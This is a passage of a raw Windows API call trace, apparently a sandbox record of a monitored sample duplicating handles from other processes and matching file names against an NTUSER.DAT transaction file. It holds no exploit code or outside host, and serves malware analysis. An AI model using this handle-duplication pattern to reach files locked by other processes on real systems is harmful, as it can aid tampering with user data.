lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.943] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.944] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.944] CloseHandle (hObject=0x670) returned 1 [0154.944] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.944] CloseHandle (hObject=0x680) returned 1 [0154.944] CloseHandle (hObject=0x62c) returned 1 [0154.944] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.944] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd44, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.945] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.945] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.946] CloseHandle (hObject=0x670) returned 1 [0154.946] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.946] CloseHandle (hObject=0x680) returned 1 [0154.946] CloseHandle (hObject=0x62c) returned 1 [0154.946] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.946] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd54, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.946] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.946] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.947] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.947] CloseHandle (hObject=0x670) returned 1 [0154.947] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.947] CloseHandle (hObject=0x680) returned 1 [0154.947] CloseHandle (hObject=0x62c) returned 1 [0154.947] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.947] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.948] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.949] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.949] CloseHandle (hObject=0x670) returned 1 [0154.949] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.949] CloseHandle (hObject=0x680) returned 1 [0154.949] CloseHandle (hObject=0x62c) returned 1 [0154.949] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.949] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.950] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.950] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.950] CloseHandle (hObject=0x670) returned 1 [0154.950] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.950] CloseHandle (hObject=0x680) returned 1 [0154.951] CloseHandle (hObject=0x62c) returned 1 [0154.951] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.951] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.951] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.952] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.952] CloseHandle (hObject=0x670) returned 1 [0154.952] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.952] CloseHandle (hObject=0x680) returned 1 [0154.952] CloseHandle (hObject=0x62c) returned 1 [0154.952] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.952] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.953] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.954] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.954] CloseHandle (hObject=0x670) returned 1 [0154.954] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.954] CloseHandle (hObject=0x680) returned 1 [0154.954] CloseHandle (hObject=0x62c) returned 1 [0154.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.954] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1294, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.954] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.955] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.955] CloseHandle (hObject=0x670) returned 1 [0154.955] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.955] CloseHandle (hObject=0x680) returned 1 [0154.955] CloseHandle (hObject=0x62c) returned 1 [0154.955] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.955] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.955] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.956] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.957] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.957] CloseHandle (hObject=0x670) returned 1 [0154.957] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.957] CloseHandle (hObject=0x680) returned 1 [0154.957] CloseHandle (hObject=0x62c) returned 1 [0154.957] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.957] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1308, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.957] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.958] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.958] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.958] CloseHandle (hObject=0x670) returned 1 [0154.958] CloseHandle (hObject=0x680) returned 1 [0154.958] CloseHandle (hObject=0x62c) returned 1 [0154.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0154.959] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.959] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.959] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.960] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.960] CloseHandle (hObject=0x670) returned 1 [0154.960] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.960] CloseHandle (hObject=0x680) returned 1 [0154.960] CloseHandle (hObject=0x62c) returned 1 [0154.960] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0154.960] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.961] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.961] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.961] CloseHandle (hObject=0x670) returned 1 [0154.961] CloseHandle (hObject=0x680) returned 1 [0154.961] CloseHandle (hObject=0x62c) returned 1 [0154.961] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0154.961] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.962] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.962] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.963] CloseHandle (hObject=0x670) returned 1 [0154.963] CloseHandle (hObject=0x680) returned 1 [0154.963] CloseHandle (hObject=0x62c) returned 1 [0154.963] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0154.963] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.965] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.966] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.966] CloseHandle (hObject=0x670) returned 1 [0154.966] CloseHandle (hObject=0x680) returned 1 [0154.966] CloseHandle (hObject=0x62c) returned 1 [0154.966] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0154.966] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.966] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.967] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.967] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.967] CloseHandle (hObject=0x670) returned 1 [0154.967] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.967] CloseHandle (hObject=0x680) returned 1 [0154.967] CloseHandle (hObject=0x62c) returned 1 [0154.968] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.968] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.968] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.968] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.969] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.970] CloseHandle (hObject=0x670) returned 1 [0154.970] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.970] CloseHandle (hObject=0x680) returned 1 [0154.970] CloseHandle (hObject=0x62c) returned 1 [0154.970] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.970] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.970] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.971] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.971] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.971] CloseHandle (hObject=0x670) returned 1 [0154.972] CloseHandle (hObject=0x680) returned 1 [0154.972] CloseHandle (hObject=0x62c) returned 1 [0154.972] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.972] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.972] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.972] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.973] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.973] CloseHandle (hObject=0x670) returned 1 [0154.973] CloseHandle (hObject=0x680) returned 1 [0154.973] CloseHandle (hObject=0x62c) returned 1 [0154.973] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.973] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.974] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.974] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.974] CloseHandle (hObject=0x670) returned 1 [0154.974] CloseHandle (hObject=0x680) returned 1 [0154.975] CloseHandle (hObject=0x62c) returned 1 [0154.975] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.975] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.975] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.976] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.976] CloseHandle (hObject=0x670) returned 1 [0154.976] CloseHandle (hObject=0x680) returned 1 [0154.976] CloseHandle (hObject=0x62c) returned 1 [0154.976] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.976] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.977] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.978] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.978] CloseHandle (hObject=0x670) returned 1 [0154.978] CloseHandle (hObject=0x680) returned 1 [0154.978] CloseHandle (hObject=0x62c) returned 1 [0154.978] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.978] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.978] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.979] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.979] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.979] CloseHandle (hObject=0x670) returned 1 [0154.979] CloseHandle (hObject=0x680) returned 1 [0154.979] CloseHandle (hObject=0x62c) returned 1 [0154.979] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.980] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.980] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.980] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.981] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.981] CloseHandle (hObject=0x670) returned 1 [0154.981] CloseHandle (hObject=0x680) returned 1 [0154.981] CloseHandle (hObject=0x62c) returned 1 [0154.981] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.981] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.982] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.983] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.983] CloseHandle (hObject=0x670) returned 1 [0154.983] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0154.983] CloseHandle (hObject=0x680) returned 1 [0154.983] CloseHandle (hObject=0x62c) returned 1 [0154.983] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.983] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.984] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.984] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.984] CloseHandle (hObject=0x670) returned 1 [0154.984] CloseHandle (hObject=0x680) returned 1 [0154.984] CloseHandle (hObject=0x62c) returned 1 [0154.984] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.984] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.001] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.004] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.004] CloseHandle (hObject=0x670) returned 1 [0155.004] CloseHandle (hObject=0x680) returned 1 [0155.004] CloseHandle (hObject=0x62c) returned 1 [0155.004] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0155.004] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.005] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.005] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.005] CloseHandle (hObject=0x670) returned 1 [0155.005] CloseHandle (hObject=0x680) returned 1 [0155.005] CloseHandle (hObject=0x62c) returned 1 [0155.006] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0155.006] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 